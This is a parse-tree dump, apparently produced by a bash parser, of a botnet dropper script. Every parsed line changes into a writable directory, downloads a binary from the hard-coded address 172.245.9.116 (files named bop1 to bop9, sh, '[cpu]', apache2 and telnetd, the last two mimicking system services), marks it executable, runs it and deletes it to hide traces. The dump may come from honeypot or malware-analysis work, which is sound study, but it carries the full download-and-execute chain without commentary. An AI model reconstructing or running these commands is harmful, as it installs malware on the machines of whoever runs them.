ListNode(lineno=2, pos=(12, 133), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 97), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 97), word='http://172.245.9.116/bop1'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(97, 98)),
  CommandNode(lineno=2, pos=(99, 112), parts=[
    WordNode(lineno=2, pos=(99, 104), word='chmod'),
    WordNode(lineno=2, pos=(105, 107), word='+x'),
    WordNode(lineno=2, pos=(108, 112), word='bop1'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(112, 113)),
  CommandNode(lineno=2, pos=(114, 120), parts=[
    WordNode(lineno=2, pos=(114, 120), word='./bop1'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(120, 121)),
  CommandNode(lineno=2, pos=(122, 133), parts=[
    WordNode(lineno=2, pos=(122, 124), word='rm'),
    WordNode(lineno=2, pos=(125, 128), word='-rf'),
    WordNode(lineno=2, pos=(129, 133), word='bop1'),
  ]),
])
ListNode(lineno=3, pos=(134, 255), parts=[
  CommandNode(lineno=3, pos=(134, 141), parts=[
    WordNode(lineno=3, pos=(134, 136), word='cd'),
    WordNode(lineno=3, pos=(137, 141), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(142, 144)),
  CommandNode(lineno=3, pos=(145, 156), parts=[
    WordNode(lineno=3, pos=(145, 147), word='cd'),
    WordNode(lineno=3, pos=(148, 156), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(157, 159)),
  CommandNode(lineno=3, pos=(160, 167), parts=[
    WordNode(lineno=3, pos=(160, 162), word='cd'),
    WordNode(lineno=3, pos=(163, 167), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(168, 170)),
  CommandNode(lineno=3, pos=(171, 179), parts=[
    WordNode(lineno=3, pos=(171, 173), word='cd'),
    WordNode(lineno=3, pos=(174, 179), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(180, 182)),
  CommandNode(lineno=3, pos=(183, 187), parts=[
    WordNode(lineno=3, pos=(183, 185), word='cd'),
    WordNode(lineno=3, pos=(186, 187), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(187, 188)),
  CommandNode(lineno=3, pos=(189, 219), parts=[
    WordNode(lineno=3, pos=(189, 193), word='wget'),
    WordNode(lineno=3, pos=(194, 219), word='http://172.245.9.116/bop2'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(219, 220)),
  CommandNode(lineno=3, pos=(221, 234), parts=[
    WordNode(lineno=3, pos=(221, 226), word='chmod'),
    WordNode(lineno=3, pos=(227, 229), word='+x'),
    WordNode(lineno=3, pos=(230, 234), word='bop2'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(234, 235)),
  CommandNode(lineno=3, pos=(236, 242), parts=[
    WordNode(lineno=3, pos=(236, 242), word='./bop2'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(242, 243)),
  CommandNode(lineno=3, pos=(244, 255), parts=[
    WordNode(lineno=3, pos=(244, 246), word='rm'),
    WordNode(lineno=3, pos=(247, 250), word='-rf'),
    WordNode(lineno=3, pos=(251, 255), word='bop2'),
  ]),
])
ListNode(lineno=4, pos=(256, 377), parts=[
  CommandNode(lineno=4, pos=(256, 263), parts=[
    WordNode(lineno=4, pos=(256, 258), word='cd'),
    WordNode(lineno=4, pos=(259, 263), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(264, 266)),
  CommandNode(lineno=4, pos=(267, 278), parts=[
    WordNode(lineno=4, pos=(267, 269), word='cd'),
    WordNode(lineno=4, pos=(270, 278), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(279, 281)),
  CommandNode(lineno=4, pos=(282, 289), parts=[
    WordNode(lineno=4, pos=(282, 284), word='cd'),
    WordNode(lineno=4, pos=(285, 289), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(290, 292)),
  CommandNode(lineno=4, pos=(293, 301), parts=[
    WordNode(lineno=4, pos=(293, 295), word='cd'),
    WordNode(lineno=4, pos=(296, 301), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(302, 304)),
  CommandNode(lineno=4, pos=(305, 309), parts=[
    WordNode(lineno=4, pos=(305, 307), word='cd'),
    WordNode(lineno=4, pos=(308, 309), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(309, 310)),
  CommandNode(lineno=4, pos=(311, 341), parts=[
    WordNode(lineno=4, pos=(311, 315), word='wget'),
    WordNode(lineno=4, pos=(316, 341), word='http://172.245.9.116/bop3'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(341, 342)),
  CommandNode(lineno=4, pos=(343, 356), parts=[
    WordNode(lineno=4, pos=(343, 348), word='chmod'),
    WordNode(lineno=4, pos=(349, 351), word='+x'),
    WordNode(lineno=4, pos=(352, 356), word='bop3'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(356, 357)),
  CommandNode(lineno=4, pos=(358, 364), parts=[
    WordNode(lineno=4, pos=(358, 364), word='./bop3'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(364, 365)),
  CommandNode(lineno=4, pos=(366, 377), parts=[
    WordNode(lineno=4, pos=(366, 368), word='rm'),
    WordNode(lineno=4, pos=(369, 372), word='-rf'),
    WordNode(lineno=4, pos=(373, 377), word='bop3'),
  ]),
])
ListNode(lineno=5, pos=(378, 499), parts=[
  CommandNode(lineno=5, pos=(378, 385), parts=[
    WordNode(lineno=5, pos=(378, 380), word='cd'),
    WordNode(lineno=5, pos=(381, 385), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(386, 388)),
  CommandNode(lineno=5, pos=(389, 400), parts=[
    WordNode(lineno=5, pos=(389, 391), word='cd'),
    WordNode(lineno=5, pos=(392, 400), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(401, 403)),
  CommandNode(lineno=5, pos=(404, 411), parts=[
    WordNode(lineno=5, pos=(404, 406), word='cd'),
    WordNode(lineno=5, pos=(407, 411), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(412, 414)),
  CommandNode(lineno=5, pos=(415, 423), parts=[
    WordNode(lineno=5, pos=(415, 417), word='cd'),
    WordNode(lineno=5, pos=(418, 423), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(424, 426)),
  CommandNode(lineno=5, pos=(427, 431), parts=[
    WordNode(lineno=5, pos=(427, 429), word='cd'),
    WordNode(lineno=5, pos=(430, 431), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(431, 432)),
  CommandNode(lineno=5, pos=(433, 463), parts=[
    WordNode(lineno=5, pos=(433, 437), word='wget'),
    WordNode(lineno=5, pos=(438, 463), word='http://172.245.9.116/bop4'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(463, 464)),
  CommandNode(lineno=5, pos=(465, 478), parts=[
    WordNode(lineno=5, pos=(465, 470), word='chmod'),
    WordNode(lineno=5, pos=(471, 473), word='+x'),
    WordNode(lineno=5, pos=(474, 478), word='bop4'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(478, 479)),
  CommandNode(lineno=5, pos=(480, 486), parts=[
    WordNode(lineno=5, pos=(480, 486), word='./bop4'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(486, 487)),
  CommandNode(lineno=5, pos=(488, 499), parts=[
    WordNode(lineno=5, pos=(488, 490), word='rm'),
    WordNode(lineno=5, pos=(491, 494), word='-rf'),
    WordNode(lineno=5, pos=(495, 499), word='bop4'),
  ]),
])
ListNode(lineno=6, pos=(500, 621), parts=[
  CommandNode(lineno=6, pos=(500, 507), parts=[
    WordNode(lineno=6, pos=(500, 502), word='cd'),
    WordNode(lineno=6, pos=(503, 507), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(508, 510)),
  CommandNode(lineno=6, pos=(511, 522), parts=[
    WordNode(lineno=6, pos=(511, 513), word='cd'),
    WordNode(lineno=6, pos=(514, 522), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(523, 525)),
  CommandNode(lineno=6, pos=(526, 533), parts=[
    WordNode(lineno=6, pos=(526, 528), word='cd'),
    WordNode(lineno=6, pos=(529, 533), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(534, 536)),
  CommandNode(lineno=6, pos=(537, 545), parts=[
    WordNode(lineno=6, pos=(537, 539), word='cd'),
    WordNode(lineno=6, pos=(540, 545), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(546, 548)),
  CommandNode(lineno=6, pos=(549, 553), parts=[
    WordNode(lineno=6, pos=(549, 551), word='cd'),
    WordNode(lineno=6, pos=(552, 553), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(553, 554)),
  CommandNode(lineno=6, pos=(555, 585), parts=[
    WordNode(lineno=6, pos=(555, 559), word='wget'),
    WordNode(lineno=6, pos=(560, 585), word='http://172.245.9.116/bop5'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(585, 586)),
  CommandNode(lineno=6, pos=(587, 600), parts=[
    WordNode(lineno=6, pos=(587, 592), word='chmod'),
    WordNode(lineno=6, pos=(593, 595), word='+x'),
    WordNode(lineno=6, pos=(596, 600), word='bop5'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(600, 601)),
  CommandNode(lineno=6, pos=(602, 608), parts=[
    WordNode(lineno=6, pos=(602, 608), word='./bop5'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(608, 609)),
  CommandNode(lineno=6, pos=(610, 621), parts=[
    WordNode(lineno=6, pos=(610, 612), word='rm'),
    WordNode(lineno=6, pos=(613, 616), word='-rf'),
    WordNode(lineno=6, pos=(617, 621), word='bop5'),
  ]),
])
ListNode(lineno=7, pos=(622, 743), parts=[
  CommandNode(lineno=7, pos=(622, 629), parts=[
    WordNode(lineno=7, pos=(622, 624), word='cd'),
    WordNode(lineno=7, pos=(625, 629), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(630, 632)),
  CommandNode(lineno=7, pos=(633, 644), parts=[
    WordNode(lineno=7, pos=(633, 635), word='cd'),
    WordNode(lineno=7, pos=(636, 644), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(645, 647)),
  CommandNode(lineno=7, pos=(648, 655), parts=[
    WordNode(lineno=7, pos=(648, 650), word='cd'),
    WordNode(lineno=7, pos=(651, 655), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(656, 658)),
  CommandNode(lineno=7, pos=(659, 667), parts=[
    WordNode(lineno=7, pos=(659, 661), word='cd'),
    WordNode(lineno=7, pos=(662, 667), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(668, 670)),
  CommandNode(lineno=7, pos=(671, 675), parts=[
    WordNode(lineno=7, pos=(671, 673), word='cd'),
    WordNode(lineno=7, pos=(674, 675), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(675, 676)),
  CommandNode(lineno=7, pos=(677, 707), parts=[
    WordNode(lineno=7, pos=(677, 681), word='wget'),
    WordNode(lineno=7, pos=(682, 707), word='http://172.245.9.116/bop6'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(707, 708)),
  CommandNode(lineno=7, pos=(709, 722), parts=[
    WordNode(lineno=7, pos=(709, 714), word='chmod'),
    WordNode(lineno=7, pos=(715, 717), word='+x'),
    WordNode(lineno=7, pos=(718, 722), word='bop6'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(722, 723)),
  CommandNode(lineno=7, pos=(724, 730), parts=[
    WordNode(lineno=7, pos=(724, 730), word='./bop6'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(730, 731)),
  CommandNode(lineno=7, pos=(732, 743), parts=[
    WordNode(lineno=7, pos=(732, 734), word='rm'),
    WordNode(lineno=7, pos=(735, 738), word='-rf'),
    WordNode(lineno=7, pos=(739, 743), word='bop6'),
  ]),
])
ListNode(lineno=8, pos=(744, 865), parts=[
  CommandNode(lineno=8, pos=(744, 751), parts=[
    WordNode(lineno=8, pos=(744, 746), word='cd'),
    WordNode(lineno=8, pos=(747, 751), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(752, 754)),
  CommandNode(lineno=8, pos=(755, 766), parts=[
    WordNode(lineno=8, pos=(755, 757), word='cd'),
    WordNode(lineno=8, pos=(758, 766), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(767, 769)),
  CommandNode(lineno=8, pos=(770, 777), parts=[
    WordNode(lineno=8, pos=(770, 772), word='cd'),
    WordNode(lineno=8, pos=(773, 777), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(778, 780)),
  CommandNode(lineno=8, pos=(781, 789), parts=[
    WordNode(lineno=8, pos=(781, 783), word='cd'),
    WordNode(lineno=8, pos=(784, 789), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(790, 792)),
  CommandNode(lineno=8, pos=(793, 797), parts=[
    WordNode(lineno=8, pos=(793, 795), word='cd'),
    WordNode(lineno=8, pos=(796, 797), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(797, 798)),
  CommandNode(lineno=8, pos=(799, 829), parts=[
    WordNode(lineno=8, pos=(799, 803), word='wget'),
    WordNode(lineno=8, pos=(804, 829), word='http://172.245.9.116/bop7'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(829, 830)),
  CommandNode(lineno=8, pos=(831, 844), parts=[
    WordNode(lineno=8, pos=(831, 836), word='chmod'),
    WordNode(lineno=8, pos=(837, 839), word='+x'),
    WordNode(lineno=8, pos=(840, 844), word='bop7'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(844, 845)),
  CommandNode(lineno=8, pos=(846, 852), parts=[
    WordNode(lineno=8, pos=(846, 852), word='./bop7'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(852, 853)),
  CommandNode(lineno=8, pos=(854, 865), parts=[
    WordNode(lineno=8, pos=(854, 856), word='rm'),
    WordNode(lineno=8, pos=(857, 860), word='-rf'),
    WordNode(lineno=8, pos=(861, 865), word='bop7'),
  ]),
])
ListNode(lineno=9, pos=(866, 987), parts=[
  CommandNode(lineno=9, pos=(866, 873), parts=[
    WordNode(lineno=9, pos=(866, 868), word='cd'),
    WordNode(lineno=9, pos=(869, 873), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(874, 876)),
  CommandNode(lineno=9, pos=(877, 888), parts=[
    WordNode(lineno=9, pos=(877, 879), word='cd'),
    WordNode(lineno=9, pos=(880, 888), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(889, 891)),
  CommandNode(lineno=9, pos=(892, 899), parts=[
    WordNode(lineno=9, pos=(892, 894), word='cd'),
    WordNode(lineno=9, pos=(895, 899), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(900, 902)),
  CommandNode(lineno=9, pos=(903, 911), parts=[
    WordNode(lineno=9, pos=(903, 905), word='cd'),
    WordNode(lineno=9, pos=(906, 911), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(912, 914)),
  CommandNode(lineno=9, pos=(915, 919), parts=[
    WordNode(lineno=9, pos=(915, 917), word='cd'),
    WordNode(lineno=9, pos=(918, 919), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(919, 920)),
  CommandNode(lineno=9, pos=(921, 951), parts=[
    WordNode(lineno=9, pos=(921, 925), word='wget'),
    WordNode(lineno=9, pos=(926, 951), word='http://172.245.9.116/bop8'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(951, 952)),
  CommandNode(lineno=9, pos=(953, 966), parts=[
    WordNode(lineno=9, pos=(953, 958), word='chmod'),
    WordNode(lineno=9, pos=(959, 961), word='+x'),
    WordNode(lineno=9, pos=(962, 966), word='bop8'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(966, 967)),
  CommandNode(lineno=9, pos=(968, 974), parts=[
    WordNode(lineno=9, pos=(968, 974), word='./bop8'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(974, 975)),
  CommandNode(lineno=9, pos=(976, 987), parts=[
    WordNode(lineno=9, pos=(976, 978), word='rm'),
    WordNode(lineno=9, pos=(979, 982), word='-rf'),
    WordNode(lineno=9, pos=(983, 987), word='bop8'),
  ]),
])
ListNode(lineno=10, pos=(988, 1109), parts=[
  CommandNode(lineno=10, pos=(988, 995), parts=[
    WordNode(lineno=10, pos=(988, 990), word='cd'),
    WordNode(lineno=10, pos=(991, 995), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(996, 998)),
  CommandNode(lineno=10, pos=(999, 1010), parts=[
    WordNode(lineno=10, pos=(999, 1001), word='cd'),
    WordNode(lineno=10, pos=(1002, 1010), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1011, 1013)),
  CommandNode(lineno=10, pos=(1014, 1021), parts=[
    WordNode(lineno=10, pos=(1014, 1016), word='cd'),
    WordNode(lineno=10, pos=(1017, 1021), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1022, 1024)),
  CommandNode(lineno=10, pos=(1025, 1033), parts=[
    WordNode(lineno=10, pos=(1025, 1027), word='cd'),
    WordNode(lineno=10, pos=(1028, 1033), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1034, 1036)),
  CommandNode(lineno=10, pos=(1037, 1041), parts=[
    WordNode(lineno=10, pos=(1037, 1039), word='cd'),
    WordNode(lineno=10, pos=(1040, 1041), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1041, 1042)),
  CommandNode(lineno=10, pos=(1043, 1073), parts=[
    WordNode(lineno=10, pos=(1043, 1047), word='wget'),
    WordNode(lineno=10, pos=(1048, 1073), word='http://172.245.9.116/bop9'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1073, 1074)),
  CommandNode(lineno=10, pos=(1075, 1088), parts=[
    WordNode(lineno=10, pos=(1075, 1080), word='chmod'),
    WordNode(lineno=10, pos=(1081, 1083), word='+x'),
    WordNode(lineno=10, pos=(1084, 1088), word='bop9'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1088, 1089)),
  CommandNode(lineno=10, pos=(1090, 1096), parts=[
    WordNode(lineno=10, pos=(1090, 1096), word='./bop9'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1096, 1097)),
  CommandNode(lineno=10, pos=(1098, 1109), parts=[
    WordNode(lineno=10, pos=(1098, 1100), word='rm'),
    WordNode(lineno=10, pos=(1101, 1104), word='-rf'),
    WordNode(lineno=10, pos=(1105, 1109), word='bop9'),
  ]),
])
ListNode(lineno=11, pos=(1110, 1223), parts=[
  CommandNode(lineno=11, pos=(1110, 1117), parts=[
    WordNode(lineno=11, pos=(1110, 1112), word='cd'),
    WordNode(lineno=11, pos=(1113, 1117), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1118, 1120)),
  CommandNode(lineno=11, pos=(1121, 1132), parts=[
    WordNode(lineno=11, pos=(1121, 1123), word='cd'),
    WordNode(lineno=11, pos=(1124, 1132), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1133, 1135)),
  CommandNode(lineno=11, pos=(1136, 1143), parts=[
    WordNode(lineno=11, pos=(1136, 1138), word='cd'),
    WordNode(lineno=11, pos=(1139, 1143), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1144, 1146)),
  CommandNode(lineno=11, pos=(1147, 1155), parts=[
    WordNode(lineno=11, pos=(1147, 1149), word='cd'),
    WordNode(lineno=11, pos=(1150, 1155), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1156, 1158)),
  CommandNode(lineno=11, pos=(1159, 1163), parts=[
    WordNode(lineno=11, pos=(1159, 1161), word='cd'),
    WordNode(lineno=11, pos=(1162, 1163), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1163, 1164)),
  CommandNode(lineno=11, pos=(1165, 1193), parts=[
    WordNode(lineno=11, pos=(1165, 1169), word='wget'),
    WordNode(lineno=11, pos=(1170, 1193), word='http://172.245.9.116/sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1193, 1194)),
  CommandNode(lineno=11, pos=(1195, 1206), parts=[
    WordNode(lineno=11, pos=(1195, 1200), word='chmod'),
    WordNode(lineno=11, pos=(1201, 1203), word='+x'),
    WordNode(lineno=11, pos=(1204, 1206), word='sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1206, 1207)),
  CommandNode(lineno=11, pos=(1208, 1212), parts=[
    WordNode(lineno=11, pos=(1208, 1212), word='./sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1212, 1213)),
  CommandNode(lineno=11, pos=(1214, 1223), parts=[
    WordNode(lineno=11, pos=(1214, 1216), word='rm'),
    WordNode(lineno=11, pos=(1217, 1220), word='-rf'),
    WordNode(lineno=11, pos=(1221, 1223), word='sh'),
  ]),
])
ListNode(lineno=12, pos=(1224, 1349), parts=[
  CommandNode(lineno=12, pos=(1224, 1231), parts=[
    WordNode(lineno=12, pos=(1224, 1226), word='cd'),
    WordNode(lineno=12, pos=(1227, 1231), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1232, 1234)),
  CommandNode(lineno=12, pos=(1235, 1246), parts=[
    WordNode(lineno=12, pos=(1235, 1237), word='cd'),
    WordNode(lineno=12, pos=(1238, 1246), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1247, 1249)),
  CommandNode(lineno=12, pos=(1250, 1257), parts=[
    WordNode(lineno=12, pos=(1250, 1252), word='cd'),
    WordNode(lineno=12, pos=(1253, 1257), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1258, 1260)),
  CommandNode(lineno=12, pos=(1261, 1269), parts=[
    WordNode(lineno=12, pos=(1261, 1263), word='cd'),
    WordNode(lineno=12, pos=(1264, 1269), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1270, 1272)),
  CommandNode(lineno=12, pos=(1273, 1277), parts=[
    WordNode(lineno=12, pos=(1273, 1275), word='cd'),
    WordNode(lineno=12, pos=(1276, 1277), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1277, 1278)),
  CommandNode(lineno=12, pos=(1279, 1310), parts=[
    WordNode(lineno=12, pos=(1279, 1283), word='wget'),
    WordNode(lineno=12, pos=(1284, 1310), word='http://172.245.9.116/[cpu]'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1310, 1311)),
  CommandNode(lineno=12, pos=(1312, 1326), parts=[
    WordNode(lineno=12, pos=(1312, 1317), word='chmod'),
    WordNode(lineno=12, pos=(1318, 1320), word='+x'),
    WordNode(lineno=12, pos=(1321, 1326), word='[cpu]'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1326, 1327)),
  CommandNode(lineno=12, pos=(1328, 1335), parts=[
    WordNode(lineno=12, pos=(1328, 1335), word='./[cpu]'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1335, 1336)),
  CommandNode(lineno=12, pos=(1337, 1349), parts=[
    WordNode(lineno=12, pos=(1337, 1339), word='rm'),
    WordNode(lineno=12, pos=(1340, 1343), word='-rf'),
    WordNode(lineno=12, pos=(1344, 1349), word='[cpu]'),
  ]),
])
ListNode(lineno=13, pos=(1350, 1483), parts=[
  CommandNode(lineno=13, pos=(1350, 1357), parts=[
    WordNode(lineno=13, pos=(1350, 1352), word='cd'),
    WordNode(lineno=13, pos=(1353, 1357), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1358, 1360)),
  CommandNode(lineno=13, pos=(1361, 1372), parts=[
    WordNode(lineno=13, pos=(1361, 1363), word='cd'),
    WordNode(lineno=13, pos=(1364, 1372), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1373, 1375)),
  CommandNode(lineno=13, pos=(1376, 1383), parts=[
    WordNode(lineno=13, pos=(1376, 1378), word='cd'),
    WordNode(lineno=13, pos=(1379, 1383), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1384, 1386)),
  CommandNode(lineno=13, pos=(1387, 1395), parts=[
    WordNode(lineno=13, pos=(1387, 1389), word='cd'),
    WordNode(lineno=13, pos=(1390, 1395), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1396, 1398)),
  CommandNode(lineno=13, pos=(1399, 1403), parts=[
    WordNode(lineno=13, pos=(1399, 1401), word='cd'),
    WordNode(lineno=13, pos=(1402, 1403), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1403, 1404)),
  CommandNode(lineno=13, pos=(1405, 1438), parts=[
    WordNode(lineno=13, pos=(1405, 1409), word='wget'),
    WordNode(lineno=13, pos=(1410, 1438), word='http://172.245.9.116/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1438, 1439)),
  CommandNode(lineno=13, pos=(1440, 1456), parts=[
    WordNode(lineno=13, pos=(1440, 1445), word='chmod'),
    WordNode(lineno=13, pos=(1446, 1448), word='+x'),
    WordNode(lineno=13, pos=(1449, 1456), word='apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1456, 1457)),
  CommandNode(lineno=13, pos=(1458, 1467), parts=[
    WordNode(lineno=13, pos=(1458, 1467), word='./apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1467, 1468)),
  CommandNode(lineno=13, pos=(1469, 1483), parts=[
    WordNode(lineno=13, pos=(1469, 1471), word='rm'),
    WordNode(lineno=13, pos=(1472, 1475), word='-rf'),
    WordNode(lineno=13, pos=(1476, 1483), word='apache2'),
  ]),
])
ListNode(lineno=14, pos=(1484, 1617), parts=[
  CommandNode(lineno=14, pos=(1484, 1491), parts=[
    WordNode(lineno=14, pos=(1484, 1486), word='cd'),
    WordNode(lineno=14, pos=(1487, 1491), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1492, 1494)),
  CommandNode(lineno=14, pos=(1495, 1506), parts=[
    WordNode(lineno=14, pos=(1495, 1497), word='cd'),
    WordNode(lineno=14, pos=(1498, 1506), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1507, 1509)),
  CommandNode(lineno=14, pos=(1510, 1517), parts=[
    WordNode(lineno=14, pos=(1510, 1512), word='cd'),
    WordNode(lineno=14, pos=(1513, 1517), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1518, 1520)),
  CommandNode(lineno=14, pos=(1521, 1529), parts=[
    WordNode(lineno=14, pos=(1521, 1523), word='cd'),
    WordNode(lineno=14, pos=(1524, 1529), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1530, 1532)),
  CommandNode(lineno=14, pos=(1533, 1537), parts=[
    WordNode(lineno=14, pos=(1533, 1535), word='cd'),
    WordNode(lineno=14, pos=(1536, 1537), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1537, 1538)),
  CommandNode(lineno=14, pos=(1539, 1572), parts=[
    WordNode(lineno=14, pos=(1539, 1543), word='wget'),
    WordNode(lineno=14, pos=(1544, 1572), word='http://172.245.9.116/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1572, 1573)),
  CommandNode(lineno=14, pos=(1574, 1590), parts=[
    WordNode(lineno=14, pos=(1574, 1579), word='chmod'),
    WordNode(lineno=14, pos=(1580, 1582), word='+x'),
    WordNode(lineno=14, pos=(1583, 1590), word='telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1590, 1591)),
  CommandNode(lineno=14, pos=(1592, 1601), parts=[
    WordNode(lineno=14, pos=(1592, 1601), word='./telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1601, 1602)),
  CommandNode(lineno=14, pos=(1603, 1617), parts=[
    WordNode(lineno=14, pos=(1603, 1605), word='rm'),
    WordNode(lineno=14, pos=(1606, 1609), word='-rf'),
    WordNode(lineno=14, pos=(1610, 1617), word='telnetd'),
  ]),
])
